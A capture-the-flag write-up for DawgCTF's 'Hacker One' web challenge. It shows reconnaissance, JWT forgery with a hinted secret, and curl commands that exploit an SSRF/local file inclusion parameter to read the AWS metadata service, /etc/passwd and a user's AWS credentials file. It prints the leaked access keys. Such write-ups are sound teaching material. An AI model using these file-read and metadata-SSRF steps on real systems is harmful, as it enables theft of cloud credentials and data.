DawgCTF - the Hacker One - Writeup
The Hacker One was a web / networking challenge in DawgCTF worth 500 points. It was written by a sponsor, HackerOne.
Initial Reconnaissance
First, as the challenge is supposed to be modelled after a bug bounty program, and as bug bounty hunting typically requires a great deal of reconnaissance, we began by port scanning umbc.h1ctf.com
.
nmap umbc.h1ctf.com
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-13 20:35 PDT
Nmap scan report for umbc.h1ctf.com (13.58.251.16)
Host is up (0.092s latency).
rDNS record for 13.58.251.16: ec2-13-58-251-16.us-east-2.compute.amazonaws.com
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 7.94 seconds
We decided that the ssh server on port 22 was probably intended for challenge administration, and was not intended to be attacked.
Upon visiting http://umb.h1ctf.com/, we discovered that the application hosted on port 80 is different from the application on port 443.
We ran a directory fuzzer on both servers:
dirsearch -u https://umbc.h1ctf.com/ -e .js
[20:39:56] 401 - 49B - /debug
[20:40:07] 200 - 3KB - /login
[20:40:17] 401 - 49B - /profile
[20:40:18] 200 - 2KB - /register
dirsearch -u http://umbc.h1ctf.com/ -e .php
[20:38:40] 200 - 154B - /debug
[20:38:46] 200 - 39B - /home
[20:39:03] 200 - 35B - /reports
[20:39:10] 200 - 35B - /reporters
Although /reports
and /reporters
required authentication to access, the page at http://umbc.h1ctf.com/debug
did not:
{
"date": "Tue Apr 14 03:43:50 UTC 2020",
"host": "Linux 5a93f1013fbb 4.15.0-1057-aws #59-Ubuntu SMP Wed Dec 4 10:02:00 UTC 2019 x86_64 GNU/Linux"
}
Bypassing Login
At this stage, we knew that the /debug
and /profile
routes on the HTTPS server accepted JWT tokens in the access_token_cookie
cookie.
The hint added to the challenge (coincidently as we got to this stage) stated that the string h1ctfsecret
would be useful. We used this secret with the HS256 JWT algorithm to sign a JWT, allowing us to access the /profile
and /debug
routes on the HTTPS server.
Discovering Swagger Documentation
Another hint revealed that the documentation was located on “another castle”. We suspected that the server was using virtual hosts. In particular, connection to the server on port 80 produced different results than connecting on port 443. We can control which host we contact by sending a manipulated Host
header.
A further hint suggested that the documentation was in a default, standard location. Swagger is one of the more common endpoint documentation engines, so we started testing various endpoints and virtual hosts.
Eventually, we found the documentation at http://swagger.rbtrust.internal/swagger.json
:
curl --resolve swagger.rbtrust.internal:80:13.58.251.16 http://swagger.rbtrust.internal/swagger.json
Exploiting LFI
Through the Swagger documentation, we discovered a local file inclusion (LFI) and server-side request forgery (SSRF) vulnerability through the url_48902
parameter in the /debug
endpoint of the server running on port 80.
We begin by searching for common log and configuration files. Although we discovered that some log and configuration files were accessible, none of them were useful to us.
Additionally, we leaked all source code from the application and determined that there were no more vulnerabilities in the code.
First, we discovered some information proving that the host was an AWS EC2 instance through SSRF to the AWS Metadata API.
curl --resolve api.ctf.internal:80:13.58.251.16 http://api.ctf.internal/debug?url_48902=http://169.254.169.254/latest/dynamic/instance-identity/document | jq -r .url
{
"accountId" : "968410616521",
"architecture" : "x86_64",
"availabilityZone" : "us-east-2b",
"billingProducts" : null,
"devpayProductCodes" : null,
"marketplaceProductCodes" : null,
"imageId" : "ami-0fc20dd1da406780b",
"instanceId" : "i-0f1eba3cb5792ea0e",
"instanceType" : "t2.2xlarge",
"kernelId" : null,
"pendingTime" : "2020-03-02T19:13:37Z",
"privateIp" : "172.31.27.125",
"ramdiskId" : null,
"region" : "us-east-2",
"version" : "2017-09-30"
}
Then, we exfiltrated the /etc/passwd
file and discovered a user named jobert
:
curl --resolve api.ctf.internal:80:13.58.251.16 http://api.ctf.internal/debug?url_48902=file:///etc/passwd | jq -r .url
jobert❌1000:1000:,,,:/home/jobert:/bin/bash
Finally, as we knew that this server was an EC2 instance and there was a user named jobert
, we checked to see if there were AWS credentials stored in /home/jobert/.aws/credentials
:
[default]
aws_access_key_id = AKIAXTCZF54KXK7B3SKQ
aws_secret_access_key = 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
Finding an S3 Bucket
We started enumerating the resources that the AWS keys had access to. Because the keys had very little access, we assumed that the AWS credentials would be useful for accessing an S3 bucket. However, we did not know the name of the bucket, and the keys did not have access to the ListBuckets
S3 operation.
Based upon the URLs in the /profile
and /debug
pages on the HTTPS server, we looked for S3 buckets which would make sense for the RBtrust application. We eventually found the rbtrust-internal
bucket based upon the https://rbtrust.internal
bug report in /profile
.
The AWS credentials had permissions to list the files in the bucket, revealing a file named flag.txt
.
We downloaded this file from S3, and it contained the flag.
flag{get_em_uPy4TWP1SQlcaukrU8GPe}